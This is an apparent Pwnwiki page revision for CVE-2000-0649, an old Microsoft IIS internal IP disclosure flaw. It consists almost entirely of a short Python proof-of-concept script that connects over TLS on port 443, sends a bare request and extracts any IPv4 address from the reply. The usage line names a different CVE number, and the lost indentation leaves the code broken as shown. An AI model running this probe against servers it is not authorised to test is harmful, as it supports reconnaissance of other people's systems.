Pwnwiki: Created page with "==POC==

 #!/usr/bin/env python3 # Written by Rafe Hart (@rafael_hart) """ Test an IP address (port 443) for CVE-2000-0649 """  import ssl import socket import re import s..."

2021-03-31T06:25:39Z

Created page with "==POC== <pre> #!/usr/bin/env python3 # Written by Rafe Hart (@rafael_hart) """ Test an IP address (port 443) for CVE-2000-0649 """ import ssl import socket import re import s..."

New page

==POC==
<pre>
#!/usr/bin/env python3
# Written by Rafe Hart (@rafael_hart)
""" Test an IP address (port 443) for CVE-2000-0649 """

import ssl
import socket
import re
import sys

def main():
if len(sys.argv) == 1:
print("\nUsage: cve-2000-0643.py <example.com> or <IP>\n")
sys.exit(1)
target = sys.argv[1]

s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
try:
s.connect((target, 443))
s = ssl.wrap_socket(s, keyfile=None, certfile=None, server_side=False, cert_reqs=ssl.CERT_NONE, ssl_version=ssl.PROTOCOL_SSLv23)
s.sendall(b'GET / HTTP/1.0\r\n\r\nConnection: close\r\n\r\n')
except socket.error as exc:
print("Did't work: %s" % exc)

while True:
new = s.recv(4096)
if not new:
s.close()
break
try:
response = new.decode()
pattern = re.compile(r'(\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3})')
if pattern.search(response):
print(target, "->", pattern.search(response).group())
except:
sys.exit(1)

if __name__ == '__main__':
main()

</pre>

CVE-2000-0649 Microsoft IIS內部IP地址洩露漏洞 - Revision history

Pwnwiki: Created page with "==POC==
#!/usr/bin/env python3 # Written by Rafe Hart (@rafael_hart) """ Test an IP address (port 443) for CVE-2000-0649 """ import ssl import socket import re import s..."